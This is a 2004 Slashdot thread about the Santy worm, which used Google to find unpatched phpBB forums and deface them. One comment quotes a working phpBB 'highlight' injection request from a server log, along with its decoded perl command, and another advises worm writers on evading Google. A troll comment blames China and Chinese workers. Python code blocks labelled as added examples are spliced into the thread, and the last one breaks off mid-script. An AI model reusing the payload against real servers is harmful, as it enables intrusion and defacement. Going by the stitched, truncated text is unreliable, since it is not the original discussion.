
Net Worm Uses Google to Spread

michael posted more than 9 years ago | from the web-service-takes-on-new-meaning dept.


troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist if you use Microsoft's Search engine to scan for the phrase 'NeverEverNoSanity'-- part of the defacement text that the Santy worm uses to replace files on infected Web sites--returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.

309 comments

Quick! (5, Funny)

Anonymous Coward | more than 9 years ago | (#11153152)

Someone figure out a way to blame this on Microsoft!

Re:Quick! (1)

ackthpt (218170) | more than 9 years ago | (#11153407)

Someone figure out a way to blame this on Microsoft!

Yeah, right. Just get out your old Fido Board.

Likely Source of Problem: China, not Microsoft (-1, Troll)

Anonymous Coward | more than 9 years ago | (#11153439)

The likely source of the culprit is China [phrusa.org]. It generates most of the spam, viruses, and malware.

Not surprisingly, Google is the carrier for spreading the infection. Google has a cozy relationship with Beijing, and many H-1Bs from China (which includes Taiwan province and Hong Kong) work at Google. Note, too, that Google quickly complies with Beijing's censorship demands -- with no questions asked.

Let's do the right "thing" and switch over to Yahoo! Search [yahoo.com].

Re:Quick! (0)

Anonymous Coward | more than 9 years ago | (#11153452)

You must be working for Microsoft.

Re:Quick! (2, Interesting)

geekopus (130194) | more than 9 years ago | (#11153465)

It might be quite the opposite:

When I copied all these entries out of the log and translated the chr()
calls, they turned out to be the attached perl script, which is capable
of finding .html files to deface, and then going to google and finding
more instances of phpbb to infect.

This is from one of the links above. So, it sounds like if a machine doesn't have Perl installed, the thing can't go to work. By sheer coincidence, most windows boxes will be immune to this particular instance of this worm (by not having Perl installed).

That's not to say that it can't be modified to carry a more portable payload. Thank god the payload wasn't itself written in PHP.

Under the Google radar (5, Interesting)

Meostro (788797) | more than 9 years ago | (#11153153)

I saw this yesterday on a.... uhh... "anatomic reference" site:
This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

I tried to find some kind of reference and Googled [google.com] for it, but I got no results.

Still nothing on it, wonder how long it'll be before it shows up?

MSN search [msn.com] returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta [msn.com] engine for the article.

Re:Under the Google radar (0, Offtopic)

swordboy (472941) | more than 9 years ago | (#11153181)

Still nothing on it, wonder how long it'll be before it shows up?

NeverEverNoSanity WebWorm generation 11 [eicar.org]

Re:Under the Google radar (-1, Troll)

kevin_conaway (585204) | more than 9 years ago | (#11153411)

Don't click on that link. You'll get infected.

Re:Under the Google radar (1)

Gogo Dodo (129808) | more than 9 years ago | (#11153509)

"Infected" with nothing. That's the EICAR test virus to make sure your antivirus software is working properly.

Re:Under the Google radar (1)

Asgard (60200) | more than 9 years ago | (#11153526)

EICAR is a standard virus-detection test string. It isn't actually a virus.

Re:Under the Google radar (2, Informative)

Anonymous Coward | more than 9 years ago | (#11153425)

Umm.. that's just the eicar.com AV test file.. not really a virus - just a file that sets off your AV software so you know it's working. Why is this informative?

Re:Under the Google radar (1, Funny)

ad0gg (594412) | more than 9 years ago | (#11153261)

Google takes a while to get information into the index, usually a couple of weeks (this doesn't apply to news sites or other sites Google deems to be updated constantly). MSN beta search usually lags about a day after a crawl. I won't even talk about how slow Yahoo is (after first crawl and index).

Re:Under the Google radar (2, Funny)

northcat (827059) | more than 9 years ago | (#11153531)

OMG! How is parent funny?!? Is this some bizarre experiment by Slashdot mods?

Re:Under the Google radar (2, Informative)

rednip (186217) | more than 9 years ago | (#11153282)

Even better, I did a search on the beta MSN site for 'NeverEverNoSanity WebWorm generation' [msn.com]. The best that I got as a search result was 20 (well, in the first couple of pages), but the site read 11 when I went to it. I suppose that the worm is writing over its own defacement.

Re:Under the Google radar (1)

mavi_yelken (801565) | more than 9 years ago | (#11153598)

I found generation 24, but when I clicked the link a normal site appeared. It seems that a quick fix does the trick.


Lycos generates an error (1)

John3 (85454) | more than 9 years ago | (#11153545)

Search for 'NeverEverNoSanity' on Lycos and you get a JScript error:

Microsoft JScript runtime error '800a1391'
'cTabTypeMulti' is undefined /common/static/error.inc, line 49

Re:Under the Google radar (5, Informative)

orangesquid (79734) | more than 9 years ago | (#11153609)

You can search for specific generations ( http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWorm+generation+4%22&FORM=QBRE ) to see the spread:
0, 1, 2, 3 - no hits
4 - 2335 hits
5 - 9297 hits
6 - 7218 hits
7 - 7288 hits
8 - 10746 hits
9 - 12009 hits
10 - 11752 hits
11 - 14866 hits
12 - 13267 hits
13 - 8393 hits
14 - 13317 hits
15 - 3840 hits
16 - 5004 hits
17 - 1950 hits
18 - 3344 hits
19 - 6 hits
20 - 1 hit
21 - 3 hits
22 - 1 hit
23 - 1 hit
24 - 1 hit
25, 26, 27, 28, 29, 30 - no hits

Note to worm writers (-1)

Anonymous Coward | more than 9 years ago | (#11153154)

Don't use Google. Yes, it's easy, but they catch on quick and disable that search. Notice not even NeverEverNoSanity [google.com] works now.

Re:Note to worm writers (0)

Anonymous Coward | more than 9 years ago | (#11153312)

RTFP dumbass

Headline is way too misleading (5, Informative)

mkop (714476) | more than 9 years ago | (#11153155)

There is nothing wrong with Google, only with people who have not patched their PHP bulletin boards.

Re:Headline is way too misleading (5, Informative)

taylortbb (759869) | more than 9 years ago | (#11153322)

Actually, it doesn't have to do with unpatched phpBB installations. It has to do with unpatched PHP installations.

phpBB has an explanation of what the problem is, it can be found at:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=248046 [phpbb.com]

OTHER FORUMS ARE VULNERABLE

(and no, I am not a phpBB zealot, I am pointing out a misconception)

Re:Headline is way too misleading (1)

gotacap (663393) | more than 9 years ago | (#11153373)

No, other boards are vulnerable to OTHER cracks. This particular worm affects a vulnerability in phpBB. If you upgrade your copy of PHP, but not phpBB, you are still vulnerable. If you use phpBB, upgrade to 2.0.11. Do it... do it now!

Re:Headline is way too misleading (1)

taylortbb (759869) | more than 9 years ago | (#11153390)

Although the cracks may not use this exact exploit they all revolve around the same security failing in PHP.

Re:Headline is way too misleading (2, Informative)

a16 (783096) | more than 9 years ago | (#11153610)

No, what you are saying is false. The phpBB 2.0.10 security issue is not related in any way to the PHP exploits discovered recently. And this worm uses the 2.0.10 exploits, not PHP.

Poor /. (5, Funny)

roman_mir (125474) | more than 9 years ago | (#11153157)

I think this virus/worm hit /., when I clicked on the link to this article, all I saw was: "Nothing for you to see here. Please move along."

NeverEverNoSanity (0)

Reducer2001 (197985) | more than 9 years ago | (#11153163)

Google must have turned this off. It's returning 0 hits now.

Re:NeverEverNoSanity (0)

Anonymous Coward | more than 9 years ago | (#11153216)

No, you are searching for sites that have already been defaced. Google is just incredibly slow to index, at least compared to the MSN search, which turns up 39,000 hits.

Re:NeverEverNoSanity (1, Interesting)

Anonymous Coward | more than 9 years ago | (#11153298)

That is only part of it. All the sites in MSN search are IIS sites. IIS actually sends info to MSN search (whether you want it to or not). While IIS has a small % of the web, it is still some 20%.

Re:NeverEverNoSanity (3, Informative)

Loether (769074) | more than 9 years ago | (#11153406)

The virus is searching google for sites not yet infected. Googling [google.com] for "Powered by phpBB" does return results. Some of which are now defaced.

If Google wants to stop the virus then they could disable "Powered by phpBB" as a search term. The reason "NeverEverNoSanity" doesn't come up on Google is because Googlebot is extremely slow to index new content on most sites.

Re:NeverEverNoSanity (0)

Anonymous Coward | more than 9 years ago | (#11153492)

mod -1 retarded

Latest Version of phpBB Unaffected (5, Informative)

akiy (56302) | more than 9 years ago | (#11153168)

It looks like the latest phpBB version 2.0.11 [phpbb.com] or a simple patch [phpbb.com] will thwart the worm, though. Time to upgrade if you haven't yet!

Re:Latest Version of phpBB Unaffected (2, Insightful)

MightyMartian (840721) | more than 9 years ago | (#11153264)

> It looks like the latest phpBB version 2.0.11 or a simple patch will thwart
> the worm, though. Time to upgrade if you haven't yet!

That's alright. All the lazy admins will blame Google and everything will be okay!

This, I suspect, is going to be a new way of infecting web-based apps. Just do a search for the vulnerable software on Google, Yahoo or whatever, pop in, do your damage and be on your way.

Of course, it will get much worse if it's some sort of e-commerce software or something like that and these worms happily start stealing credit card transactions.

Re:Latest Version of phpBB Unaffected (4, Insightful)

topynate (694371) | more than 9 years ago | (#11153308)

Given that probably 90% of script kiddies find targets with Google, it could only be a matter of time before someone automated the process.

Maybe it's a theme - the worms of tomorrow will do what the script kiddies of today do.

Re:Latest Version of phpBB Unaffected (5, Informative)

Cutriss (262920) | more than 9 years ago | (#11153278)

Yes and no.

It will protect your boards from being targeted by the Google component of the worm. However, if your boards are running on a shared server, and someone else has a vulnerable version of phpBB installed on their space, you could still be vulnerable. The worm is designed to poke around once it manages to lodge itself inside a host.

Ordinarily, you could just blame those infected in this manner for not using proper permissions on their board installs, but with the amount of custom modifications many people have installed on their boards, it'd be no surprise if 90% of the people that think they're safe actually aren't. Make sure your files aren't writeable, folks.

Re:Latest Version of phpBB Unaffected (2, Funny)

Martin Blank (154261) | more than 9 years ago | (#11153354)

Good job. You do know that by Slashdotting the phpBB.com server, you're preventing people from patching, right? :)

And in a complete upset (4, Funny)

Marxist Hacker 42 (638312) | more than 9 years ago | (#11153178)

Microsoft search beats Google at indexing pages hacked by this virus! MS Search turns up 39000 pages, Google turns up zero on the same nonsense keyword!

Re:And in a complete upset (0)

Anonymous Coward | more than 9 years ago | (#11153458)

Uh, I just searched at MSN using their search window, and it turned up 3 hits, two of which appear to have recovered already.

Infect Slashdot (5, Funny)

somethinghollow (530478) | more than 9 years ago | (#11153179)

When it infects sites running SlashCode, it pretends to be a legitimate post (so it can get the defacement tag "NeverEverNoSanity" on the front page), then monitors for posting, and tries to get first post, too.

It works both ways. (0)

mikeophile (647318) | more than 9 years ago | (#11153225)

Google API's can be used for good or evil.

Re:It works both ways. (1)

gl4ss (559668) | more than 9 years ago | (#11153506)

The Google API is just a convenient helper in all this.

Besides, I doubt it would use it.. as to use it you need to have a code and they could just turn that key off (and there's some 1000 limit on one key, or at least there should be).

So.. what I'm saying is that you don't really need the Google API for doing regular Google searches; you could do them via HTTP.......

Hmmmm (0)

sadcox (173714) | more than 9 years ago | (#11153229)

Looks like it's actually a php problem, not a phpBB problem--or did I read it wrong?

From phpBB.com

Recently a serious exploitable issue was discovered in PHP (the scripting language in which phpBB, IPB, vB, etc. are written) versions prior to 4.3.10. The problematical functions include unserialize and realpath. phpBB (along with a great many other scripts including IPB, vB, etc.) use these two functions as a matter of course.

It has come to our attention that code has now been released which uses this exploit in PHP to obtain confidential information in phpBB. Such information includes data contained in phpBB's config.php file. We therefore recommend the following:

1) If you maintain your own server be sure to upgrade to the newest available release of PHP (both versions 4 and 5). Be aware that at this time phpBB 2.0.x has problems functioning under PHP5 without modification.

2) If you pay for hosting ensure your hosting provider has upgraded their installation of PHP (again remember that phpBB 2.0.x and other scripts will not function under PHP5 without modification).

Please do not submit this PHP issue to our security tracker, it is beyond our control. Fixed versions of PHP do exist and as above we encourage you to ensure your system is running such a version. Equally please examine any "hacking" issues you have carefully to ensure they are not caused by this PHP problem (rather than phpBB). Remember, this is not a phpBB exploit or problem, it's a PHP issue and thus can affect any PHP script which uses the noted functions.

Re:Hmmmm (3, Informative)

Sikmaz (686372) | more than 9 years ago | (#11153313)

Different exploit. That is a separate problem that allows people to do even more bad things such as reading your config.php to get your SQL password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10.

Not PHP Bugs - phpBB exploit is used (5, Informative)

a16 (783096) | more than 9 years ago | (#11153582)

As per the parent of this post, the post modded '+5 Informative' is false and includes the wrong announcement.

This is not caused by the php bugs, it uses an issue in phpBB 2.0.10 and below. 2.0.11 fixes this, and has been available for ages (over a month).

So in summary, if you use phpBB - upgrade to 2.0.11 now - not upgrading is not an option.

I feel the above needs to be clarified, as there are already numerous people posting false information. Upgrading your PHP version won't protect against this (but you need to do it anyway to protect against other issues) - upgrading to phpBB 2.0.11 will. Simple :)

Re:Hmmmm (1)

TheRagingTowel (724266) | more than 9 years ago | (#11153433)

I got this from lunarpages:
Hello,

Lunarpages wants to clarify some confusion regarding current exploits involving PHP and PHPbb.

Recently we emailed all customers notifying them to make sure to upgrade their PHPbb (a third party application bulletin board) to the latest version as there are known, serious exploits on any version lower than 2.0.11. This must be done. We are seeing many customers who are having problems with their boards getting hacked because they have not upgraded. Please see the following articles for more information on this: http://www.kaspersky.com/news?id=156681162 or http://www.phpbb.com/phpBB/viewtopic.php?t=248811&highlight=worm.

Also, there is a known exploit in PHP itself (the programming language). Lunarpages is diligently working to upgrade all servers to the latest version of PHP and Zend Optimizer. We are upgrading to PHP version 4.3.10 and Zend Optimizer to version 2.5.7. These are completely separate issues. Just upgrading PHP on the servers to the current version will not fix exploits in PHPbb. We have yet to see any serious issues regarding the PHP exploit; however, we will still ensure we have the latest, most secure version available.

PHPbb boards running versions less than 2.0.11 must be upgraded. It is imperative that this email is not ignored and that all customers who run a PHPbb board upgrade immediately to protect the integrity of their site.

Please note that it is your responsibility to keep current backups of your site and that you should always back up your site before any major change. Lunarpages can supply a backup to you. However, restoring a site is charged at $75.00 per hour. To get a quote for this or for questions or concerns regarding this email, please contact support@lunarpages.com.

Thank you for your immediate attention to this matter.

Lunarpages Support

Re:Hmmmm (0)

Anonymous Coward | more than 9 years ago | (#11153451)

That's the recent PHP bug, but the Santy worm actually uses the older phpBB highlight SQL injection (11/19/4). See the crafted URL that was posted to Bugtraq yesterday: http://www.securityfocus.com/archive/1/385063/2004-12-18/2004-12-24/0

A few things.. (0)

Flaming_cows (798162) | more than 9 years ago | (#11153233)

First of all, the exploit is in PHP (see here [theinquirer.net]), not phpBB, the worm just happens to attack phpBB. I just think that should be cleared up before people start spreading FUD about how phpBB is insecure.

Secondly, this issue has been patched for a month now (see this announcement [phpbb.com]) and the phpBB group has reminded users several times to upgrade.

Dshield disagrees (3, Insightful)

JustinXB (756624) | more than 9 years ago | (#11153334)

See here [sans.org]
Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case.
Who are you going to believe: Some news site or a security community?

Different Exploit (1)

Sikmaz (686372) | more than 9 years ago | (#11153356)

As I posted above, that is a separate problem that allows people to do even more bad things such as reading your config.php to get your SQL password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10.

Re:Different Exploit (1)

Sikmaz (686372) | more than 9 years ago | (#11153378)

Err crap, I shouldn't have copied and pasted; my post isn't entirely clear in this context ;) This worm exploits a problem in phpBB 2.0.10 that is fixed in 2.0.11. The other issue is a PHP problem that can be solved via the workaround I posted above or using PHP 4.3.10.

Re:A few things.. (2, Interesting)

psyon1 (572136) | more than 9 years ago | (#11153422)

No, as someone else already responded to other posts, it is a phpBB problem. phpBB calls the urldecode() function on form variables, after PHP already does so. It allows ' to bypass the magic quotes that PHP so lovingly puts on all our form data. The latest bug reports were reported after the release of the exploit for phpBB 2.0.10 and earlier. IIRC the report said that some scripts MAY be vulnerable, but didn't state for certain. As far as I know, no one has yet to release an exploit for the bugs; it's just a possibility.
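The double-decode described in this comment, as an added example that is not from the thread or from phpBB's code: a Python model of the input path where PHP decodes the query value once, magic_quotes_gpc escapes quotes, and phpBB 2.0.10 then calls urldecode() a second time. The assumption is that magic_quotes_gpc behaves like addslashes() on the value PHP has already decoded; the "fixed" path simply omits the second decode.

```python
"""Model of the phpBB 2.0.10 double-urldecode bug (added example, not phpBB code).

PHP decodes a GET value once, then magic_quotes_gpc (assumed here to behave like
addslashes()) escapes quotes. phpBB 2.0.10 then decoded the value AGAIN, so a
double-encoded quote (%2527) slipped past the escaping step and became a bare '.
"""
from urllib.parse import unquote


def php_decode_get(raw: str) -> str:
    """PHP's own decoding of a query-string value: exactly one urldecode."""
    return unquote(raw)


def magic_quotes(value: str) -> str:
    """magic_quotes_gpc as modelled by addslashes(): backslash-escape ' " and \\."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\")
        out.append(ch)
    return "".join(out)


def vulnerable_highlight(raw: str) -> str:
    """phpBB 2.0.10 path: PHP decodes, magic quotes escape, phpBB decodes again.

    At the time magic_quotes runs, %2527 has only become %27, which contains no
    quote to escape; the second decode then yields an unescaped single quote.
    """
    return unquote(magic_quotes(php_decode_get(raw)))


def fixed_highlight(raw: str) -> str:
    """Hardened path: no second urldecode, so the escaped value is what is used."""
    return magic_quotes(php_decode_get(raw))


def contains_unescaped_quote(value: str) -> bool:
    """True if a single quote appears that is not preceded by a backslash."""
    for i, ch in enumerate(value):
        if ch == "'" and (i == 0 or value[i - 1] != "\\"):
            return True
    return False


if __name__ == "__main__":
    for raw in ("%27", "%2527", "kernel"):
        print(raw, "->", repr(vulnerable_highlight(raw)), "| fixed:", repr(fixed_highlight(raw)))
```

Running it shows that a single-encoded quote is escaped on both paths, while the double-encoded form only reaches the code unescaped on the vulnerable path.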

Re:A few things.. (1)

infiniteedge (634048) | more than 9 years ago | (#11153522)

please mod down the parent, that is incorrect. the problem is NOT in PHP, it is in an old version of phpBB.

http://www.f-secure.com/v-descs/santy_a.shtml

Re:A few things.. (1)

Flaming_cows (798162) | more than 9 years ago | (#11153585)

Odd, that's not what topics on phpBB.com say, but I guess you may be right. Regardless, the issue was patched a month ago and people have been reminded to upgrade many times.

My site (0)

Anonymous Coward | more than 9 years ago | (#11153234)

This worm hit my site (http://www.koolplace.com) yesterday. It replaced all of the .htm, .html, and .php files with a message that the site had been defaced. Thankfully we were able to restore most of the site from backups.

I got hit HARD! :( (5, Interesting)

Broadband (602443) | more than 9 years ago | (#11153238)

This worm is unbelievably evil.

What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extensions and overwrites them with the 264 byte file that simply states "Web site defaced".

I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

I've been spending the past 24 hours picking up the pieces and trying to get everything back online. 1/2 done now.

If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before I get that site back online.

-BB

Re:I got hit HARD! :( (1)

PitaBred (632671) | more than 9 years ago | (#11153303)

Unlucky generation 13, eh? I heard it was worse than the others.
Yes, it was a lame joke. I couldn't think of anything better :(

Re:I got hit HARD! :( (1)

KhaZ (160984) | more than 9 years ago | (#11153315)

I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

You kind of point out in that sentence alone that your drive wasn't secure, now was it? :).

Best thing I can recommend, is use some sort of RCS, (http://www.perforce.com/ [perforce.com] is great for up to two people, free!), and then make a checkpoint or a targz of it nightly.

Re:I got hit HARD! :( (2, Informative)

Anonymous Coward | more than 9 years ago | (#11153434)

That's why I don't call it a backup if it's hot. If you just put in a second drive, it doesn't save you from 'rm -rf /' or from a power supply that commits suicide... and decides to take the rest of the hardware with it.

Backups are on cold hardware, on a shelf. At the minimum. Preferably in another building.

Re:I got hit HARD! :( (1)

the_rev_matt (239420) | more than 9 years ago | (#11153442)

If your backup was unshared and secure it wouldn't have been overwritten. Keeping a backup on the same machine is the same as not having a backup. I would argue that keeping a backup on the same subnet is the same as not having a backup.

Ehhh.. Tape drive perhaps?? (2, Insightful)

scsirob (246572) | more than 9 years ago | (#11153444)

This is the main issue with hard disks as backup. They don't provide security against these kinds of attacks as they are just as vulnerable as any other disk attached to the system.

A tape drive for backups may seem like a 'thing from the past', but it's *very* effective in these instances...

Re:Ehhh.. Tape drive perhaps?? (1)

pembo13 (770295) | more than 9 years ago | (#11153554)

What about an IDE HDD in an external drive case (USB)? That's what I use, but I don't have much to spend.

Re:Ehhh.. Tape drive perhaps?? (1)

biz0r (656300) | more than 9 years ago | (#11153602)

Forgive me if I am wrong (although pretty damn sure I am right)...but the primary difference between a tape drive and a hard drive is the method and times in which they are accessed. A hard drive (usually) is just a locally mounted file storage device which is accessed via a certain directory through the normal methods. A tape drive has many options as to how it is used, but the primary reason it would be unaffected versus a hard drive is that the tape drive is unmounted/disconnected from main/general access (at least most of the time).

Solution? Unmount any backup drives when you are not doing any backups...I don't care that it's mounted in such a way that only root can access it, it's still dangerous (for backup purposes).

Re:Ehhh.. Tape drive perhaps?? (4, Informative)

Zen Punk (785385) | more than 9 years ago | (#11153604)

Nonsense. A hard drive on the shelf, in the safe, whatever, is no more vulnerable than a tape on the shelf. If you left your backup tape mounted all the time, it would be just as insecure as adding a second drive and calling it a "backup."

Re:I got hit HARD! :( (1)

Broadband (602443) | more than 9 years ago | (#11153536)

I'm well aware that it wasn't the best form of backup, and the funny thing is I just reinstalled the machine and OS and the 2nd drive was an identical mirror. That was 7 days ago. I thought to myself, I'll back up to physical media this weekend. What's the chance I could lose that data in 7 days? I learned my lesson :P Fortunately I do have backups; they just aren't as easy as a copy since they're on various media. What a great Christmas gift, eh?

Here's one (0)

Anonymous Coward | more than 9 years ago | (#11153320)

http://chat.ravenlive.com

My Christmas gift! Noooooo! (2, Funny)

286 (620933) | more than 9 years ago | (#11153401)

So I get my present, in the mail, a little early.
A new HDTV card...
I go to download [pchdtv.com] the linux only drivers and...

NeverEverNoSanity!!!

Argh! &$@*#! Humbug.

Re:My Christmas gift! Noooooo! (1)

picklepuss (749206) | more than 9 years ago | (#11153667)

I just noticed that same thing... except I was thinking about ordering one.

Now I'm not sure I'm going to. People complaining because the drivers are out of date or don't work correctly, and I realize that they seldom check their own forums (user PCHDTVTech has just 2 posts ever)... an unpatched phpBB and they're just adding more straw to a broken camel

Did someone see the google ad ? (1)

yogikoudou (806237) | more than 9 years ago | (#11153418)

Ad under the article says :
Own a website ? Google.
Why not Website pwn3d ? Google.

Santy Worm (0)

Anonymous Coward | more than 9 years ago | (#11153441)

...the defacement text that the Santy worm...

Ho Ho Ho, remember kids, Santy Worm knows if you've been bad or good...

For all of you saying it's a PHP exploit (5, Informative)

VeneficusAcerbus (724294) | more than 9 years ago | (#11153456)

From ISC:
Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, it's still a good idea to update php.

I got hit (2, Insightful)

Ghoser777 (113623) | more than 9 years ago | (#11153459)

My poor linux box - I felt so secure and then this little worm gets out. Thank god I had some recent backups, otherwise this would have really sucked. I guess it's alright though - you have to get rooted one time before you really understand how vulnerable the internet makes all of us.

Why MSN works and Google Doesn't (1)

infiniteedge (634048) | more than 9 years ago | (#11153483)

The reason is simple. Microsoft, being the Good Guys, stopped responding to that query to stop the spread of the worm. The worm was dependent on Google to return vulnerable servers via a search query. So Google has temporarily stopped responding to that search. MSN wasn't targeted by the worm because real hackers all know Google is the best :-). However, in this case would MSN have reacted as fast as Google did? Should the coder have picked MSN to get a longer lasting worm?

address tag and no robots (1)

99BottlesOfBeerInMyF (813746) | more than 9 years ago | (#11153484)

I looked at a defaced page and there were two things I noticed. The first was that the worm does not seem to create a robots.txt file to hide defaced pages from search engines. Second, the majority of the text is contained in an ADDRESS, HTML tag. It is a valid tag, but does anyone actually use it? I have not seen it before as far as I can recall.

Re:address tag and no robots (2, Informative)

daten (575013) | more than 9 years ago | (#11153583)

The ADDRESS element may be used by authors to supply contact information for a document or a major part of a document such as a form. This element often appears at the beginning or end of a document.

http://www.w3.org/TR/html401/struct/global.html#edef-ADDRESS [w3.org]

I've used it for years. By the way, how often do you review the html source of webpages you visit?

Re:address tag and no robots (1)

99BottlesOfBeerInMyF (813746) | more than 9 years ago | (#11153665)

By the way, how often do you review the html source of webpages you visit?

Occasionally. I have also edited quite a few different ones for one reason or another. I was not meaning to imply that it was not valid. I was just wondering if it was obscure and unused, or just something I have not run across. It still seems an odd inclusion in a page created by a worm.

Relating to this, I wonder, is there any way to get google to search based upon html tags? For example, could I find all pages with address tags.

Distribution security updates to PHP? (0, Offtopic)

errorlevel (415281) | more than 9 years ago | (#11153507)

Does anybody know what distributions are affected by this vulnerability?

The last PHP update (which is where the vulnerability lies) for Debian Woody is from July 20th.

Re:Distribution security updates to PHP? (1)

lightdarkness (791960) | more than 9 years ago | (#11153524)

If I recall correctly, the bug that is being exploited is just phpBB specific, and not pertaining to PHP itself.

There have, in recent days, been exploits found in PHP that phpBB uses, but I don't believe those have been exploited on a mass scale.

Get 4.3.10+ (1)

D_Lehman(at)ISPAN.or (799775) | more than 9 years ago | (#11153584)

It fixes many exploit paths, and fixes handling of the $PHP_SELF variable. $PHP_SELF is potentially vulnerable to cross site scripting on versions 4.3.9 and earlier. This is part of the problem, as I understand it, with some phpBB exploits.

You are also good to go if you get 5.0.3, or so I have heard.

The Robot Threat (2, Informative)

D_Lehman(at)ISPAN.or (799775) | more than 9 years ago | (#11153546)

Robots aren't bad, they help people find things, and get them to your site. However, if you would rather keep them away from you, consider using your robots.txt http://www.robotstxt.org/ [robotstxt.org] along with meta tags on pages. You can also set certain content to be filtered out by looking at the connecting agent. Things you should consider filtering out would be admin links/pages, version numbers (often in the footer of pages), and files that aren't related to content. There's no reason for Google to know what your login pages look like, for instance.

If I've said it once, I've said it 1000 times. When you secure the old tech first, you find fewer problems with the new tech. robots.txt, .htaccess, proper chmod/chown... these are the things that can prevent a new bug from being a really bad new bug.

ouch, thats a nasty one! (1)

museumpeace (735109) | more than 9 years ago | (#11153579)

google found nothing, MSN search found this
Results 1-3 of about 3 containing ""WebWorm Generation""

1. This site is defaced!!!
This site is defaced!!! NeverEverNoSanity WebWorm generation 5.
www.videocardforum.com

2. This site is defaced!!!
This site is defaced!!! NeverEverNoSanity WebWorm generation 8.
www.dslwebserver.com/main/sbs-zonealarm-configure.html

3. This site is defaced!!!
This site is defaced!!! NeverEverNoSanity WebWorm generation 11.
sprites.planet-megaman.com/credits.shtml

when asked to find "Webworm Generation". But why only 3 if thousands were reported in the art.? Maybe the sysadmins all cleaned things up in the last 1/2 hour?
Mountain View...I think we have a problem....

Santy.A Claus is Coming! (1)

Stanistani (808333) | more than 9 years ago | (#11153597)

Headline from Computerworld [computerworld.com]:

New worm, Santy.A, using Google to spread

He sees you when you're posting, he knows when you write spam, he hates it when you flame users, so be good for goodness' sake!

This one's fun to debug - perl via url (5, Interesting)

falzbro (468756) | more than 9 years ago | (#11153607)

I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

Here's the first line from the logfile:
[20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

If you decode the ascii characters [asciitable.com], you get:

perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

I didn't have enough free time to decode the whole thing due to.. actual work having to be done, but it's quite clever.

--falz
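The decoding falz describes by hand (double URL-decode the `highlight` parameter, then join the `chr()` values) is easy to automate for log triage. The following is an added example, not falz's code or anything from phpBB; the access-log lines it scans are constructed here, with the first one carrying the same `chr()` sequence quoted above and a made-up client address, and the `SANTY_MARKERS` list is an assumption about what an analyst would look for, not a published signature.

```python
"""Decode chr()-encoded payloads in phpBB ``highlight`` requests and flag
them in an access log.  Added example; not the commenter's own code."""
import re
import urllib.parse

# Constructed access-log lines (not from a real server).  The first carries
# the chr() sequence quoted in the comment above; the second is benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738'
    '&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)'
    '%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)'
    '%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)'
    '%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)'
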